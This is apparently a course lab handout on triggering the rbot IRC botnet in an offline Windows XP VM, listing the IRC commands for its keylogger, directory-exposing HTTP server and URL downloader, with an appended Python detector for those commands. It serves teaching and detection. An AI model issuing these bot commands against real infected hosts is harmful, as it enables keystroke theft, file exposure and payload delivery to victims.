IDS and Penetration Testing Lab IIIa




Dissecting a Botnet C&C - rbot Triggering Lab

Malware operation

Upon execution the malware connects to the botirc.net server and establishes a standard IRC session with the #test channel (PASS, NICK, USER). Typically the malware registers itself with the nick [M]bBot XXXX, where XXXX are four random digits. After establishing the session, the malware enters an infinite loop that receives IRC messages, interprets commands and executes them. Via these commands the malware provides three main functionalities: keylogger, HTTP server and downloader.

Experiment setup

To run and trigger the rbot malware, an IRC server and client are required, together with connectivity from the malware to the IRC server. In the setup demonstrated in class, the malware was executed in a Windows XP SP2 VM (disconnected from the Internet). This VM also runs a local IRC server using the bewareircd utility. To control the bot instance we run a simple IRC client, the mirc utility. Since the malware connects to an IRC server named Botirc.net, we need to resolve that name locally by adding a corresponding entry to the %SYSTEMROOT%\system32\drivers\etc\hosts file, such as:

127.0.0.1 Botirc.net

Using this configuration, perform the following steps to activate the rbot instance:

1. Run the IRC server (c:\distr\bewareircd-win32\bircd.exe). It creates a local IRC server ready to host new servers and channels.
2. Set up the mirc client.
   a. Start the client.
   b. Create a new IRC server (press Add, then specify Botirc.net and any ID, e.g. r_bot_server_test). This registers an IRC server named Botirc.net:
   c. Double click on the created server.
   d. Enter the #test channel and click Join. This starts the IRC session.
   e. Now run rbot (bbot); you should see it join the session. You can send it the commands given in the next section. Welcome to rbot C&C!

Commands triggering

To activate a component/functionality of the bot, one needs to send a certain notice message to the bot instance over the IRC channel. The table below presents the required format of the IRC commands.

Functionality/Component: Keylogger
  Command to malware: /notice bot_instance_nick keylog file
  Result: The malware creates a thread that traces the current window focus and pressed keys using a hookless technique (i.e. GetAsyncKeyState based). The traced keys and context data are stored in c:\windows\system32\key.txt.
  Example: /notice [M]bBot 4842 keylog file
  Response from malware (if successful): [KEYLOG]: Key logger active.

Functionality/Component: HTTP server
  Command to malware: /notice bot_instance_nick httpserver port path
  Result: The malware starts an HTTP server that listens on the given port and provides access to the specified directory (path).
  Example: /notice [M]bBot 4842 httpserver 1235 C:\windows\
  Example response from malware (if successful): [HTTPD]: Server listening on IP: 127.0.0.1:1235, Directory: C:\windows\.

Functionality/Component: Downloader
  Command to malware: /notice bot_instance_nick d0wnl04d URL target_file
  Result: The malware downloads a file from the specified URL to the specified file on the victim host.
  Example: /notice [M]bBot 9497 d0wnl04d http://gmail.com/gmail.htm c:\gmail_copy.htm
  Example response from malware (if successful):
  [DOWNLOAD]: Downloading URL: http://gmail.com/gmail.htm to: c:\gmail_copy.htm.
  [DOWNLOAD]: Downloaded 57.8 KB to c:\gmail_copy.htm @ 57.8 KB/sec.

Examples

Keylogger

The figures below show screenshots of successful keylogger activation. The first figure shows the typical response from the malware to the keylogger command. The second screen shows the log file (c:\windows\system32\key.txt).

HTTP server

The figures below show screenshots of successful HTTP server activation.

Downloader

The figures below show screenshots of successful downloader activation.
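As an added, defender-side example (not part of the original lab handout), the following Python script parses raw IRC lines, such as an IRC server log or a packet capture of the lab session would contain, and flags the rbot indicators described in the Commands triggering section: the [M]bBot nick registration, NOTICE messages carrying the keylog, httpserver or d0wnl04d verbs, and the bot's [KEYLOG]/[HTTPD]/[DOWNLOAD] status replies. The handout prints the nick as "[M]bBot XXXX"; since IRC nicks cannot contain spaces, a "-", "_" or no separator is assumed here, and the sample session lines are constructed rather than taken from a real capture.

```python
import re

# Nick format from the lab handout ("[M]bBot XXXX", four random digits). IRC nicks
# cannot contain spaces, so a "-", "_" or no separator is assumed here.
BOT_NICK = re.compile(r"^\[M\]bBot[-_]?\d{4}$")
# C&C verbs from the handout's command table, mapped to the component they trigger.
COMMANDS = {"keylog": "keylogger", "httpserver": "http server", "d0wnl04d": "downloader"}
# Status prefixes the bot emits on success, per the handout.
STATUS = re.compile(r"^\[(KEYLOG|HTTPD|DOWNLOAD)\]:")

def parse_irc(line):
    """Split one raw IRC line into (sender nick or None, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
        prefix = prefix.split("!", 1)[0]            # nick part of nick!user@host
    head, sep, trailing = line.partition(" :")      # " :" starts the trailing param
    parts = head.split()
    return prefix, parts[0].upper(), parts[1:], (trailing if sep else None)

def detect_rbot(lines):
    """Return one alert dict per rbot registration, C&C command or status reply."""
    alerts = []
    for raw in lines:
        if not raw.strip():
            continue
        sender, cmd, params, trailing = parse_irc(raw.rstrip("\r\n"))
        if cmd == "NICK" and params and BOT_NICK.match(params[0]):
            alerts.append({"type": "registration", "nick": params[0]})
        elif cmd == "NOTICE" and params and trailing and BOT_NICK.match(params[0]):
            words = trailing.split()
            if words and words[0].lower() in COMMANDS:   # operator -> bot command
                alerts.append({"type": "command", "nick": params[0],
                               "component": COMMANDS[words[0].lower()], "args": words[1:]})
        elif sender and trailing and BOT_NICK.match(sender) and STATUS.match(trailing):
            alerts.append({"type": "status", "nick": sender, "message": trailing})
    return alerts

# Constructed sample of the lab session as the IRC server would see it (not a real capture).
SAMPLE = [
    ":botirc.net NOTICE AUTH :*** Looking up your hostname",
    "NICK [M]bBot-4842",
    "USER bbot 0 * :bbot",
    "JOIN #test",
    ":operator!op@127.0.0.1 NOTICE [M]bBot-4842 :keylog file",
    ":[M]bBot-4842!bot@127.0.0.1 PRIVMSG #test :[KEYLOG]: Key logger active.",
    ":operator!op@127.0.0.1 NOTICE [M]bBot-4842 :httpserver 1235 C:\\windows\\",
    ":operator!op@127.0.0.1 PRIVMSG #test :hello everyone",
]
```

Running detect_rbot(SAMPLE) yields four alerts (registration, keylogger command, keylogger status, HTTP server command); the ordinary channel chatter and the server's own NOTICE produce none.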